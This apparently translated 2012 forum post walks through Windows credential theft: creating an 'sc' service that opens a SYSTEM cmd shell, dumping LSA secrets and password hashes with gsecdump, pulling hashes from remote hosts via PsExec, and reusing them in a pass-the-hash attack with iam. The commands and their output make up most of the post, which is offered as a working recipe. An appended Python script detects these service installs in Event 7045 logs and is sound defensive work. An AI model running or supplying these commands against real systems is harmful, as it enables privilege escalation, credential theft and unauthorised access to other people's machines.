Hash injection attack

Posted on 2012-11-6 21:09:29
To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A hint: you can use iam from the pshtools package to load the hash information just captured with gsecdump into the local lsass process, which gives you a hash injection attack. The foreigners really are good at this; administrators are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, never actually need the password cracked at all; it is purely a matter of using the tools. As the original article puts it well, whether the password is 4 characters or 127, as long as you have the hash you can get in 100% of the time.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
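As an added defensive example (not code from the post or from any tool it names): a parser for Windows System-log Event ID 7045 "A service was installed in the system" messages that flags the two installs seen in the post above, a service whose image path is cmd.exe running as LocalSystem, and the PSEXESVC service that PsExec creates on the target host. The message layout and the helper names are my assumptions, and the sample records are constructed.

```python
import re

def event_7045(name, image, account="LocalSystem", start="demand start"):
    """Build a constructed Event ID 7045 message body in the layout Windows uses."""
    return ("A service was installed in the system.\n"
            f"Service Name: {name}\nService File Name: {image}\n"
            f"Service Type: user mode service\nService Start Type: {start}\n"
            f"Service Account: {account}")

# Constructed samples: the post's cmd.exe service, a PsExec install, a benign one.
SAMPLE_7045 = [
    event_7045("shellcmdline", r"C:\WINDOWS\system32\cmd.exe /K start"),
    event_7045("PSEXESVC", r"%SystemRoot%\PSEXESVC.exe"),
    event_7045("Spooler", r"%SystemRoot%\System32\spoolsv.exe", start="auto start"),
]

FIELD_RE = re.compile(r"^(Service(?: \w+)*): (.*)$", re.MULTILINE)
# Any command-shell executable in the image path (this also catches one in the
# arguments, which is acceptable for a hunting heuristic).
SHELL_RE = re.compile(r"(?:^|[\\/])(?:cmd|command|powershell|pwsh)\.exe\b", re.IGNORECASE)
REMOTE_EXEC_SERVICES = {"PSEXESVC"}  # service name PsExec installs on the target

def parse_7045(message):
    """Return the 'Service ...: value' fields of a 7045 message as a dict."""
    return {k: v.strip() for k, v in FIELD_RE.findall(message)}

def suspicious_reasons(fields):
    """Why a service install is suspicious; an empty list means not flagged."""
    reasons = []
    if SHELL_RE.search(fields.get("Service File Name", "")):
        reasons.append("image path launches a command shell")
        if fields.get("Service Account", "").lower() == "localsystem":
            reasons.append("that shell runs as LocalSystem")
    if fields.get("Service Name", "").upper() in REMOTE_EXEC_SERVICES:
        reasons.append("PsExec remote-execution service installed")
    return reasons

def scan(messages):
    """Map service name -> reasons for every flagged 7045 record."""
    hits = {}
    for msg in messages:
        fields = parse_7045(msg)
        if reasons := suspicious_reasons(fields):
            hits[fields["Service Name"]] = reasons
    return hits

if __name__ == "__main__":
    for name, why in scan(SAMPLE_7045).items():
        print(f"{name}: {'; '.join(why)}")
```

The Spooler record is there to show that an ordinary LocalSystem service does not trip the rules; only the shell image path and the known remote-execution service name do.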